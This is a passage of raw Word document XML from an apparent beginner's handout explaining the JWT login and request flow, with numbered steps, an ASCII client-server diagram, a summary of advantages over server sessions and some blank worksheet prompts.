      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">JWT Flow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0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🔑  User Sends Login</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">You send your username and password to the server. This is the only time you ever send your password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">✅  Server Verifies Credentials</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server checks the database — are the credentials correct? If yes, proceed to generate a token.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🏭  Server Generates a JWT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server creates a token containing your user ID, role, and expiry time. It signs the token with a secret key only the server knows.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">📤  JWT Sent to Client</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The signed token is sent back in the response body. Your browser or app receives it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">💾  Client Stores the JWT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Your browser saves the token (in localStorage, sessionStorage, or a cookie — more on this in the security section).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">📡  Every Request Includes the JWT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">You send the token in every request inside the "Authorization" header: Authorization: Bearer &lt;your-token-here&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🔐  Server Verifies the JWT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server checks: Is the signature valid? Has the token expired? If both are fine — access granted. No session lookup needed!</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875A" w:sz="8"/>
              <w:left w:val="single" w:color="00875A" w:sz="8"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="8"/>
              <w:right w:val="single" w:color="00875A" w:sz="8"/>
            </w:tcBorders>
            <w:shd w:fill="08111E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="200"/>
              <w:left w:type="dxa" w:w="320"/>
              <w:bottom w:type="dxa" w:w="200"/>
              <w:right w:type="dxa" w:w="320"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  CLIENT                                     SERVER</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  ──────                                     ──────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  1. POST /login                 ─────────&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">     {username, password}                   Verify credentials</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                            Generate JWT (signed)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  2. 200 OK + JWT token          &lt;─────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">     [Client stores token]                  (no session stored!)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                            </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  3. GET /dashboard              ─────────&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">     Authorization: Bearer JWT              Verify JWT signature ✓</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                            Check expiry ✓</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  4. 200 OK (dashboard data)     &lt;─────────</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">                                            </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">  KEY POINT: Server stores NOTHING. The token carries all needed info.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">             Any server can verify the token — just needs the secret key.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875A" w:sz="4"/>
              <w:left w:val="single" w:color="00875A" w:sz="24"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="4"/>
              <w:right w:val="single" w:color="00875A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00875A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅  Why JWT Solves All Three Session Problems</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Server Restart? — No problem. The token is with the client. Server memory is irrelevant.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">High Traffic? — No problem. Server does not store any session data. Zero memory cost per user.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Multiple Servers? — No problem. Any server can verify the token as long as it has the secret key.</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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT is different from sessions because:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="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0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="7A849C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The word 'stateless' means:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7360"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:type="dxa" w:w="0"/>
              <w:left w:type="dxa" w:w="0"/>
              <w:bottom w:type="dxa" w:w="0"/>
              <w:right w:type="dxa" w:w="0"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
